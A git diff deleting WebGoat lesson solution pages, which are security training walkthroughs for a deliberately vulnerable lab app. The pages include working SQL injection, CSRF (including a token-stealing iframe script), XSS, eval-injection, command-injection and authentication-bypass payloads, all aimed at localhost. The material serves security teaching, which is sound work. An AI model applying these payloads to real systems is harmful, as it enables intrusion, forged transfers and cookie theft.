-The expression above compares the first letter to H. It will return false and show invalid account number. Changing the boolean expression to < 'L' returns true, so we know the letter is between H and L. With a few more queries, we can determine the first letter is J . Note that capitalization matters, and it's right to assume the first letter is capitalized.
-To determine the second letter, we have to change the SUBSTRING parameters to compare against the second letter. We can use this command:
-101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2 , 1) < 'h ' );
-Using several more queries, we can determine the second letter is i . Note that we are comparing the second character to a lowercase h. Continue this process until you have the rest of the letters.
-The name is Jill . Enter this name to complete the lesson. Capitalization matters.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/BypassHtmlFieldRestrictions.html b/src/main/webapp/lesson_solutions_1/BypassHtmlFieldRestrictions.html
deleted file mode 100644
index a0a7d4a84..000000000
--- a/src/main/webapp/lesson_solutions_1/BypassHtmlFieldRestrictions.html
+++ /dev/null
@@ -1,37 +0,0 @@
-
-
-
-
-Solution: Bypass HTML Field Restrictions
-
-
-
-Lesson Plan Title: Bypass HTML Field Restrictions
-
-Concept / Topic To Teach:
-Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application
-
-
-General Goal(s):
-The user should be able send the website input that it wasn't expecting.
-For this exercise, your job is to break the client side validation and send the website input that it wasn't expecting, including input for the disabled field. You must break all 6 validators at the same time .
-
-
-Solution:
-To solve this lesson, we need to put invalid characters (slashes, quotes, etc.) into all six fields. Since three of the fields are toggles or dropdowns, we will need to intercept the request with Webscarab.
-We still need to put invalid data in the disabled field, however. There are two ways of accomplishing this; we can enable the field using Firebug, or we can insert an additional field using Webscarab.
-
-To enable the field, open Firebug and find the form containing all of our fields. Find the text input named "disabledinput". Delete the disabled="" parameter. This causes the field on the page to be unlocked, and will also cause the disabledinput variable to appear in Webscarab.
-
-Enabled input after removing the "disabled" parameter in Firebug.
-The other option is to add another variable when intercepting the request with Webscarab. When the intercept request window pops up, use the insert button to add a new variable called disabledinput .
-Either way you add the input, the next step is to invalidate all of the responses. Put any symbol or character that isn't allowed in for each variable. Make sure you put more than five characters in the field that is limited by length.
-
-
-Correctly filled in request with all fields invalidated and the disabledinput variable added.
-
-Submit the request to complete the lesson.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CSRF.html b/src/main/webapp/lesson_solutions_1/CSRF.html
deleted file mode 100644
index db3af3e8b..000000000
--- a/src/main/webapp/lesson_solutions_1/CSRF.html
+++ /dev/null
@@ -1,869 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform Cross Site Request Forgery.
-
-
-
-
Concept
-/ Topic To Teach:
-
-
This
-lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks.
-
-
-
-
How
-the attacks works:
-
-
Cross-Site
-Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a
-page that contains img links like the one below:
-
-
<img
-src=" http://www.mybank.com/sendFunds.do?acctId=123456 "/>
-
-
When
-the victim's browser attempts to render this page, it will issue a request to
-www.mybank.com to the transferFunds.do page with the specified parameters. The
-browser will think the link is to get an image, even though it actually is a
-funds transfer function. The request will include any cookies associated with
-the site. Therefore, if the user has authenticated to the site, and has either
-a permanent cookie or even a current session cookie, the site will have no way
-to distinguish this from a legitimate user request. In this way, the attacker
-can make the victim perform actions that they didn't intend to, such as logout,
-purchase item, or any other function provided by the vulnerable website
-
-
-
-
General
-Goal(s):
-
-
Your
-goal is to send an email to a newsgroup that contains an image whose URL is
-pointing to a malicious request. Try to include a 1x1 pixel image that includes
-a URL. The URL should point to the CSRF lesson with an extra parameter
-"transferFunds=4000". You can copy the shortcut from the left hand
-menu by right clicking on the left hand menu and choosing copy shortcut.
-Whoever receives this email and happens to be authenticated at that time will
-have his funds transferred. When you think the attack is successful, refresh
-the page and you will find the green check on the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
-
-
-
-
Figure 1 How to perform CSRF
-
-
-
-
Solution:
-
-
-
-
To
-complete this lesson you need to embed HTML code in the message box. This HTML
-code should contain a image tag linking to an URL that is not a real image will but start a transaction on the web
-server instead.
-
-
-
-
The
-format of an image in html is <img src="[URL]" width="1"
-height="1" />
-
-
The transaction can be triggered by an URL to the
-current lesson and an extra parameter "transferFunds" and the amount. The
-width=1 and height=1 will not show the image.
-
-
-
-
This payload will work:
-
-
<img
-src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
-width="1" height="1" />
-
-
-
-
So create a new message with title "Test" and a
-message with the payload.
-
-
-
-
Figure 2 Insert payload
-
-
-
-
The page will refresh and you will see a new message
-in the message list.
-
-
-
-
-
-
Figure 3 New message test
-
-
-
-
Click
-on the message test. This will download the message and display the contents as
-HTML, executing the payload. Examine the HTTP Request in WebScarab that is
-generated when the browers tries to render the image tag.
-
-
-
-
-
-
Figure 4 CSRF attack
-
-
-
-
Now
-you need to refresh the page to get the green star next to the lesson.
-
-
-
-
-
-
Figure 5 Lesson completed
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/ClientSideFiltering.html b/src/main/webapp/lesson_solutions_1/ClientSideFiltering.html
deleted file mode 100644
index fe08a4bdf..000000000
--- a/src/main/webapp/lesson_solutions_1/ClientSideFiltering.html
+++ /dev/null
@@ -1,84 +0,0 @@
-
-
-
-
-Client Side Filtering
-
-
-
-Lesson Plan Title: Client Side Filtering
-
-Concept / Topic To Teach:
-It is always a good practice to send to the client
-only information which they are supposed to have access to.
-In this lesson, too much information is being sent to the
-client, creating a serious access control problem.
-
-
-General Goal(s):
-For this exercise, your mission is exploit the extraneous
-information being returned by the server to discover information
-to which you should not have access.
-
-
-Solution:
-
-This Lab consists of two Stages. In the first Stage you have to
-get sensitive information . In the second one you have to fix the problem.
-
-Stage 1
-
-Use Firebug to solve this stage. If you are using IE you can try it with
-IEWatch.
-
-First use any person from the list and see what you get. After doing this you
-can search for a specific person in Firebug. Make sure you find the hidden table with
-the information, including the salary and so on. In the same table you will find
-Neville.
-
-
-Inspect HTML on Firebug
-
-
-Now write the salary into the text edit box and submit your answer!
-
-Stage 2
-
-In this stage you have to modify the clientSideFiltering.jsp which you will find under
-the WebContent in the lessons/Ajax folder. The Problem is that
-the server sends all information to the client. As you could see
-even if it is hidden it is easy to find the sensitive date. In this
-stage you will add a filter to the XPath queries. In this file you will find
-following construct:
-
- StringBuffer sb = new StringBuffer();
-
- sb.append("/Employees/Employee/UserID | ");
- sb.append("/Employees/Employee/FirstName | ");
- sb.append("/Employees/Employee/LastName | ");
- sb.append("/Employees/Employee/SSN | ");
- sb.append("/Employees/Employee/Salary ");
-
- String expression = sb.toString();
-
-
-This string will be used for the XPath query. You have to guarantee that a manger only
-can see employees which are working for him. To archive this you can use
-filters in XPath. Following code will exactly do this:
-
- StringBuffer sb = new StringBuffer();
-
- sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/UserID | ");
- sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/FirstName | ");
- sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/LastName | ");
- sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/SSN | ");
- sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/Salary ");
-
- String expression = sb.toString();
-
-
-Now only information is sent to your client you are authorized for. You can click on the button.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/ClientSideValidation.html b/src/main/webapp/lesson_solutions_1/ClientSideValidation.html
deleted file mode 100644
index b23fb0875..000000000
--- a/src/main/webapp/lesson_solutions_1/ClientSideValidation.html
+++ /dev/null
@@ -1,64 +0,0 @@
-
-
-
-
-Insecure Client Storage
-
-
-
-Lesson Plan Title: Insecure Client Storage
-
-Concept / Topic To Teach:
-It is always a good practice to validate all input
- on the server side. Leaving the mechanism for validation
- on the client side leaves it vulnerable to reverse engineering.
- Remember, anything on the client side should not be considered a secret.
-
-
-
-General Goal(s):
-For this exercise, your mission is to discover a coupon
-code to receive an unintended discount. Then, exploit the use
-of client side validation to submit an order with a cost of zero.
-
-Solution:
-For the solution you need a plugin for your browser, which is capable of debugging
-Javascript. For IE you can use IEWatch. This solution is written for Firebug
-which is a plugin for Firefox.
-
-
-Stage 1
-
-First we want to try to get a coupon code to get something cheaper. Open
-Firebug and click on the Script Tab. Make sure you choose clientSideValidation.js
-on the dropdown list. Toggle a breakpoint on the line:
-decrypted = decrypt(coupons[i]);
-Now enter a character in the coupon code field. The Javascript gets executed
-but stops at the breakpoint. On the right side you see the parameters
-and there values. Now use the step over symbol or F10. Now you can read
-the clear text of decrypted:
-
-
-
-Figure 1 Firebug in action
-
-
-Now that you know the coupon name enter it in the coupon field, purchase something
-and you are done.
-
-
-Stage 2
-
-You can not edit the Prices in the Shopping Cart. The reason is that the readonly
-attribute is set for this field.
-
-To get rid of this attribute open Firebug. Make sure this time you use
-the HTML View. You can directly in
-Firebug search for readonly and elemenate this attribute.The field for the total is
-called GRANDTOT. After having deleted the readonly attribute from GRANDTOT
-it is possible to change the price directly in the browser. Select any products
-you like, change the total field to 0 and hit the purchase button.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CommandInjection.html b/src/main/webapp/lesson_solutions_1/CommandInjection.html
deleted file mode 100644
index 7e19dd78a..000000000
--- a/src/main/webapp/lesson_solutions_1/CommandInjection.html
+++ /dev/null
@@ -1,739 +0,0 @@
-
-
-
-
-
-
-
-Solution: Command Injection
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Perform Command Injection
-
-
-
-
Concept / Topic To Teach:
-
-
Command
-injection attacks represent a serious threat to any parameter-driven site. The methods
-behind an attack are easy to learn and the damage caused can range from
-considerable to complete system compromise. Despite these risks an incredible
-number of systems on the internet are susceptible to this form of attack.
-
-
-
-
Not only is
-it a threat easily instigated, it is also a threat that, with a little
-common-sense and forethought, can be almost totally prevented. This lesson will
-show the student several examples of parameter injection.
-
-
-
-
It is always
-good practice to sanitize all input data, especially data that will used in OS
-command, scripts, and database queries.
-
-
-
-
General Goal(s):
-
-
The user
-should be able to execute any command on the hosting OS.
-
-
-
-
-
-
Figure 1 Lesson 16
-
-
-
-
Solution:
-
-
-
-
Select a
-lesson from the drop-down box and click on "View".
-
-
-
-
-
-
-
-
Intercept the
-request with WebScarab when you click on "View". Append " & netstat -an
-& ipconfig to the HelpFile parameter. Do not forget the double quote!
-
-
-
-
-
-
Figure 2 Injecting command netstat & ipconfig
-
-
-
-
The result
-contains the output of the command netstat and ipconfig.
-
-
-
-
-
-
Figure 3 Command Injection results
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/ConcurrencyCart.html b/src/main/webapp/lesson_solutions_1/ConcurrencyCart.html
deleted file mode 100644
index 2c19a9918..000000000
--- a/src/main/webapp/lesson_solutions_1/ConcurrencyCart.html
+++ /dev/null
@@ -1,32 +0,0 @@
-
-
-
-
-Shopping Cart Concurrency Flaw
-
-
-
-Lesson Plan Title: Shopping Cart Concurrency Flaw
-
-Concept / Topic To Teach:
-Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe. Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently.
-
-
-General Goal(s):
-For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.
-
-
-Solution:
-1. Open a new browser window on the same page.
-2. In window A you choose a low cost item and click "Purchase".
-
-Window A
-3. In window B you choose the a high cost item you want to buy and click "update cart". The variable of the price has been overwritten now.
-
-Window B
-4. In window A you can click click "Confirm" and you bought your item for a lower price.
-
-Window A Success
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CsrfPromptByPass.html b/src/main/webapp/lesson_solutions_1/CsrfPromptByPass.html
deleted file mode 100644
index caeeedb03..000000000
--- a/src/main/webapp/lesson_solutions_1/CsrfPromptByPass.html
+++ /dev/null
@@ -1,110 +0,0 @@
-
-
-
-
-Client Side Filtering
-
-
-
-Lesson Plan Title: Prompt By-Pass with CSRF
-
-Concept / Topic To Teach:
-This lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks containing
-multiple requests to by-pass a scriptable user-prompt
-
-
-General Goal(s):
-Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple
-malicious requests: the first to transfer funds, and the second a request to confirm the prompt
-that the first request triggered. The URL should point to this lesson with an extra
-parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the
-left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever
-receives this email and happens to be authenticated at that time will have his funds transferred.
-When you think the attack is successful, refresh the page and you will find the green check on
-the left hand side menu
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
-Solution:
-
-Start by crafting an image or iframe tag similar to the CSRF LAB: <img
-src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
-width="1" height="1" />
-
-This image request will not result in a transfer of funds but will instead
-prompt the user for confirmation. To see the confirmation prompt, try typing in the URL of the
-Lesson with the extra parameter of "transferFunds=4000"
-
-
-User Prompt
-
-
-Next look at the source of the page to see what parameters the confirmation requires.
-The form in the confirmation prompt looks like the following:
-
-
-<form accept-charset ='UNKNOWN' method ='POST' action ='attack?Screen=5&menu=900' enctype ='application/x-www-form-urlencoded' >
- <input name ='transferFunds' type ='submit' value ='CONFIRM' >
- <input name ='transferFunds' type ='submit' value ='CANCEL' >
-</form >
-
-From this we see the next forged command will need the folllowing URL:
-attack?Screen=5&menu=900&transferFunds=CONFIRM
-This solution shows how to do this attack with both iframes and images. The next step is to
-add the additional forged confirmation request. However, an additional iframe or image with
-this URL will not be sufficient. The second request must load after the first. So add
-Javascript to load the second command after the first. For iframes, make the onload attribute
-of the first frame set the src of the second iframe:
-
-
-<iframe
- src ="http://localhost:8080/WebGoat/attack?Screen=5&menu=900&transferFunds=400"
- id ="myFrame" frameborder ="1" marginwidth ="0"
- marginheight ="0" width ="800" scrolling =yes height ="300"
- onload ="document.getElementById('frame2').src='http://localhost:8080/WebGoat/attack?Screen=5&menu=900&transferFunds=CONFIRM';" >
- </iframe >
-
-<iframe
- id ="frame2" frameborder ="1" marginwidth ="0"
- marginheight ="0" width ="800" scrolling =yes height ="300" >
-</iframe >
-
-
-
-Next add the iframes into a message stored on the web page:
-
-Insert iframes hack picture
-
-The following shows the result of clicking on the malicious iframe message:
-
-Results of iframes hack picture
-In the above image, note that the first frame shows the user prompt, the result of the
-first forged request to transfer funds. In the second frame the results of the second
-forged request (the confirmation) are shown, indicating that 4000 dollars were successfully
-transfered. Refreshing the page will indicate that this lesson has been completed.
-
-
-In a real attack these results would be hidden from the end user. Click "restart this lesson"
-to attempt the attack again, only this time try hiding the attack with hidden or very small frames.
-
-
-For images, loading an html page as an image will cause an error. So instead of using the onload attribute, use onerror:
-
-
-<img
-src="http://localhostattack?Screen=81&menu=210&transferFunds=5000"
-onerror="document.getElementById('image2').src='http://localhostattack?Screen=81&menu=210&transferFunds=CONFIRM'"
-width="1" height="1" />
-<img
-id="image2"
-width="1" height="1" />
-
-
-Next store the malicious images in a message and click the message to attempt the attack.
-
-Picture of adding malicious image requests
-Refreshing the page should indicate that this lesson has been completed. Congratulations. One way for developers to limit
-CSRF attacks is to only allow requests to be issued via HTTP Post. That would remove any attacks by images or iframes, but
-not for XmlHttpRequests in Javascript. For extra credit, you could try the same attack but instead use XmlHttpRequest over post.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CsrfTokenByPass.html b/src/main/webapp/lesson_solutions_1/CsrfTokenByPass.html
deleted file mode 100644
index 1b66f2d72..000000000
--- a/src/main/webapp/lesson_solutions_1/CsrfTokenByPass.html
+++ /dev/null
@@ -1,122 +0,0 @@
-
-
-
-
-CSRF Token By-Pass
-
-
-
-Lesson Plan Title: CSRF Token Prompt By-Pass
-
-Concept / Topic To Teach:
-This lesson teaches how to perform CSRF attacks on sites that use tokens to mitigate CSRF attacks, but are vulnerable to CSS attacks.
-
-
-
-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into
-loading a page that contains a 'forged request' to execute commands with the
-victim's credentials.
-
-Token-based request authentication deters these attacks. This technique
-inserts tokens into pages that issue requests. These tokens are required to
-complete a request, and help verify that requests are not scripted. CSRFGuard from OWASP uses
-this technique to help prevent CSRF attacks.
-
-However, this technique can be by-passed if CSS vulnerabilities exist on the same site.
-Because of the same-origin browser policy, pages from the same domain can read content from
-other pages from the same domain.
-
-General Goal(s):
-Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious
-request to transfer funds. To successfully complete you need to obtain a valid request token. The
-URL that presents the transfer funds form is the same as the CSRF lesson with an extra parameter
-"transferFunds=main". Load this page, read the token and append the token in a forged request
-to transferFunds. When you think the attack is successful, refresh the page and you will find the
-green check on the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
-
-
-Solution:
-
-Similar to the CSRF LAB, you must forge a request that will transfer funds. However,
-a request will not result in a transfer of funds unless it has a correct token. To find
-a valid token, you could look at the form that the site generates to submit a transfer of funds.
-To see the transfer funds page, try typing in the URL of the Lesson with the extra parameter
-of "transferFunds=main"
-
-
-Transfer initiation form
-
-
-Next look at the source of the page to see what parameter the token comes in.
-
-<form accept-charset ='UNKNOWN' id ='transferForm' method ='POST' action ='attack?Screen=2&menu=900' enctype ='application/x-www-form-urlencoded' >
- <input name ='transferFunds' type ='text' value ='0' >
- <input name ='CSRFToken' type ='hidden' value ='1745740650' >
- <input type ='submit' >
-</form >
-
-From this we see a forged command will need the CSRFToken parameter.
-
-
This solution loads this page in an iframe and reads the token out of the frame.
-Note that this is possible because the message originates from the same domain and
-does not violate the "same origin policy". So even thought this page has taken
-measures to prevent CSRF attacks, those measures can be side-stepped because of
-CSS vulnerabilites. To pull out the CSRFToken, the following javascript locates the
-frame, then the form, then saves the token
-
-
-var tokenvalue;
-
-function readFrame1()
-{
- var frameDoc = document.getElementById("frame1").contentDocument;
- var form = frameDoc.getElementsByTagName("form")[1];
- var token = form.CSRFToken.value;
- tokenvalue = '&CSRFToken='+token;
-
- loadFrame2();
-}
-
-function loadFrame2()
-{
- var testFrame = document.getElementById("frame2");
- testFrame.src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;
-}
-
-
-readFrame1 will read the frame's content for the CSRFToken, save it and then call loadFrame2
-LoadFrame2 will then append the token and load a second frame.
-
-The following frames loads the transfer page in the first frame. When it finishes loading, it will
-call readFrame1, which calls loadFrame2, which then sets the src for the second iframe.
-
-
-
-
-
-<iframe src ="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=main"
- onload ="readFrame1();"
- id ="frame1" frameborder ="1" marginwidth ="0"
- marginheight ="0" width ="800" scrolling =yes height ="300" ></iframe >
-<iframe id ="frame2" frameborder ="1" marginwidth ="0"
- marginheight ="0" width ="800" scrolling =yes height ="300" ></iframe >
-
-
-
-The next picture shows inserting this code into a message:
-
-Inserting CSRF code into message
-
-The following picture shows the results of someone hitting this page. Note that no effort was taken to
-hide the results of the two frames. The first frame shows the transfer funds form, and the second shows
-the results of the CSRF attack. Try another post that will hide these iframes from being noticed.
-
The next picture shows inserting this code into a message:
-
-Results of viewing the malicious message
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/DOMInjection.html b/src/main/webapp/lesson_solutions_1/DOMInjection.html
deleted file mode 100644
index 1e73150f0..000000000
--- a/src/main/webapp/lesson_solutions_1/DOMInjection.html
+++ /dev/null
@@ -1,865 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform DOM Injection Attack.
-
-
-
-
Concept /
-Topic To Teach:
-
-
How to
-perform DOM injection attacks.
-
-
-
-
How the
-attacks works:
-
-
Some applications
-specially the ones that uses AJAX manipulates and updates the DOM directly
-using JavaScript, DHTML and eval() method.
-An attacker may take advantage of that by intercepting the reply and try to
-inject some javascript commands to exploit his attacks.
-
-
-
-
General
-Goal(s):
-
-
*
-Your victim is a system that takes an activation key to allow you to use it.
-* Your goal should be to try to get to enable the activate button.
-* Take some time to see the HTML source in order to understand how the key
-validation process works.
-
-
-
-
-
-
Figure 1 AJAX Security - DOM Injection
-
-
-
-
Solution:
-
-
-
-
AJAX requires
-XML communication between the browser and the web application. When you view
-the source of the HTML page, you will notice the usage of XMLHttpRequest:
-
-
-
-
<script>
-
-
function
-validate() {
-
-
var keyField
-= document.getElementById('key');
-
-
var url =
-'attack?Screen=80&menu=1150&from=ajax&key=' +
-encodeURIComponent(keyField.value);
-
-
if (typeof
-XMLHttpRequest != 'undefined') {
-
-
req
-= new XMLHttpRequest();
-
-
} else if
-(window.ActiveXObject) {
-
-
req
-= new ActiveXObject('Microsoft.XMLHTTP');
-
-
}
-
-
req.open('GET', url, true);
-
-
req.onreadystatechange = callback;
-
-
req.send(null);
-
-
}
-
-
function
-callback() {
-
-
if (req.readyState == 4) {
-
-
if (req.status == 200) {
-
-
var message = req.responseText;
-
-
eval(message);
-
-
}}}
-
-
</script>
-
-
-
-
The XML
-response contains JavaScript that will activate the button so that you are able
-to click on it. This requires you to inject JavaScript to manipulate the
-Document Object Model of the HTML page in the browser. This requires
-intercepting the HTTP response in WebScarab!
-
-
-
-
Enter a
-license key (for example 'a') and intercept the HTTP Request and HTTP Response
-in WebScarab.
-
-
-
-
-
-
Figure 2 HTTP Request
-
-
-
-
-
-
Figure 3 HTTP Response
-
-
-
-
Intercept the
-reply and replace the body with document.form.SUBMIT.disabled = false;
-
-
-
-
-
-
Figure 4 Updated HTTP Response
-
-
-
-
The button “Activate!” is now enabled!
-
-
-
-
-
-
Figure 5 Activate! Button is enabled
-
-
-
-
-
-
Figure 6 Lesson completed
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/DOMXSS.html b/src/main/webapp/lesson_solutions_1/DOMXSS.html
deleted file mode 100644
index 2cfa4d90d..000000000
--- a/src/main/webapp/lesson_solutions_1/DOMXSS.html
+++ /dev/null
@@ -1,51 +0,0 @@
-
-
-
-
-DOM Based Cross Site Scripting (XSS)
-
-
-
-Lesson Plan Title: DOM Based Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-The Document Object Model (DOM) presents an interesting problem from a security standpoint. It allows the content of a web page to be dynamically modified, but that can be abused by attackers during a malicious code injection. XSS, a type of malicious code injection, can occur when unvalidated user input is used directly to modify the content of a page on the client side.
-
-
-General Goal(s):
-For this exercise, your mission is to use this vulnerability to inject malicious code into the DOM. Then in the last stage, you will correct the flaws in the code to address the vulnerability.
-
-
-Solution:
-Stage 1: Enter "<IMG SRC="images/logos/owasp.jpg"/>" and submit the solution.
-
-Stage 1 result
-Stage 2: Enter "<img src=x onerror=;;alert('XSS') />" and submit the solution.
-
-Stage 2 result
-Stage 3: Enter "<IFRAME SRC="javascript:alert('XSS');"></IFRAME>" and submit the solution.
-
-Stage 3 result
-Stage 4: Enter "Please enter your password:<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR> <BR><BR><BR><BR><BR><BR><BR><BR>" and submit the solution.
-
-Stage 4 result
-Stage 5: You have to use the JavaScript escape.js for the input.
-You will find the JavaScripts in tomcat\webapps\WebGoat\javascript ( Standart Version ) or in WebContent\javascript ( Developer Version ).
-Open the JavaScript DOMXSS.js
-function displayGreeting(name) {
- if (name != ''){
- document.getElementById("greeting").innerHTML="Hello, " + name + "!";
- }
-}
-
-You have to change this to:
-function displayGreeting(name) {
- if (name != ''){
- document.getElementById("greeting").innerHTML="Hello, " + escapeHTML(name); + "!";
- }
-}
-
-The attacks will no longer work.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/DOS_Login.html b/src/main/webapp/lesson_solutions_1/DOS_Login.html
deleted file mode 100644
index 575a3916f..000000000
--- a/src/main/webapp/lesson_solutions_1/DOS_Login.html
+++ /dev/null
@@ -1,704 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: Denial of
-Service from Multiple Logins
-
-
-
-
Concept /
-Topic To Teach:
-
-
Denial of
-service attacks are a major issue in web applications. If the end user cannot conduct
-business or perform the service offered by the web application, then both time
-and money is wasted.
-
-
-
-
General
-Goal(s):
-
-
This site
-allows a user to login multiple times. This site has a database connection pool
-that allows 2 connections. You must obtain a list of valid users and create a
-total of 3 logins.
-
-
Solution:
-
-
-
-
This site
-allows a user to login multiple times. There is a database connection pool that
-allows 2 connections. You must obtain a list of valid users and create a total
-of 3 logins.
-
-
-
-
Let's try a
-SQL Injection attack. Enter in the password field ' or '1' = '1
-
-
-
-
-
-
Figure 1 Lesson 20
-
-
-
-
Login with
-user name jsnow and password passwd1. Then login with user name jdoe and
-password passwd1. And finally login with jplane and passwd3.
-
-
-
-
-
-
Figure 2 Lesson 20 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/DangerousEval.html b/src/main/webapp/lesson_solutions_1/DangerousEval.html
deleted file mode 100644
index a2f353c50..000000000
--- a/src/main/webapp/lesson_solutions_1/DangerousEval.html
+++ /dev/null
@@ -1,28 +0,0 @@
-
-
-
-
-Dangerous Use of Eval
-
-
-
-Lesson Plan Title: Dangerous Use of Eval)
-
-Concept / Topic To Teach:
-It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is reflected directly into an HTTP response. In this lesson, unvalidated user-supplied data is used in conjunction with a Javascript eval() call. In a reflected XSS attack, an attacker can craft a URL with the attack script and store it on another website, email it, or otherwise trick a victim into clicking on it.
-
-
-General Goal(s):
-For this exercise, your mission is to come up with some input which, when run through eval, will execute a malicious script. In order to pass this lesson, you must 'alert()' document.cookie.
-
-
-Solution:
-The value of the digit access code field is placed in the Javascript eval() function. This is the reason why your attack will not require the "<script>" tags.
-Enter: 123');alert(document.cookie);('
-The result on the server is:
- eval('123');
-alert(document.cookie);
-(' ');
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Encoding.html b/src/main/webapp/lesson_solutions_1/Encoding.html
deleted file mode 100644
index 08375aab2..000000000
--- a/src/main/webapp/lesson_solutions_1/Encoding.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
-
-
-Encoding Basics
-
-
-
-Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
-
-Concept / Topic To Teach:
-Different encoding schemes can be used in web applications for different reasons.
-
-
-General Goal(s):
-This lesson will familiarize the user with different encoding schemes.
-
-
-Solution:
-Enter the string "abc". In the List below you see the encoded value of the string. For rot13 encoding this is "nop". Now enter a string "a c" and have a look on the url encoding.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/FailOpenAuthentication.html b/src/main/webapp/lesson_solutions_1/FailOpenAuthentication.html
deleted file mode 100644
index a6d9b7a47..000000000
--- a/src/main/webapp/lesson_solutions_1/FailOpenAuthentication.html
+++ /dev/null
@@ -1,741 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Bypass a Fail Open
-Authentication Scheme
-
-
-
-
Concept / Topic To Teach: Abusing error handling.
-
-
-
-
This lesson presents
-the basics for understanding the "fail open" condition regarding
-authentication. The security term, "fail open" describes a behavior of a
-verification mechanism. This is when an error (i.e. unexpected exception)
-occurs during a verification method causing that method to evaluate to true.
-This is especially dangerous during login.
-
-
-
-
General Goal(s):
-
-
The user
-should be able to bypass the authentication check.
-
-
-
-
-
-
Figure 1 Lesson 19
-
-
-
-
Solution:
-
-
-
-
Enter user
-name webgoat and click "Login". Intercept the request with WebScarab.
-
-
-
-
-
-
Figure 2 Intercepted request
-
-
-
-
Click on the
-variable "Password" and click "Delete". Click "Accept changes".
-
-
-
-
-
-
Figure 3 Password variable is deleted
-
-
-
-
You are now
-"authenticated" as WebGoat.
-
-
-
-
-
-
Figure 4 Lesson 19 Completed
-
-
-
-
The problem
-is that the exception handler in the Java code is executing a catch block for successful
-authentication. The exception occurs because there is a NullPointer exception
-when reading out the password parameter.
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/ForcedBrowsing.html b/src/main/webapp/lesson_solutions_1/ForcedBrowsing.html
deleted file mode 100644
index be8032dac..000000000
--- a/src/main/webapp/lesson_solutions_1/ForcedBrowsing.html
+++ /dev/null
@@ -1,767 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform Forced Browsing Attacks.
-
-
-
-
Concept
-/ Topic To Teach:
-
-
How
-to Exploit Forced Browsing.
-
-
-
-
How
-the attacks works:
-
-
Forced
-browsing is a technique used by attackers to gain access to resources that are
-not referenced, but are nevertheless accessible. One technique is to manipulate
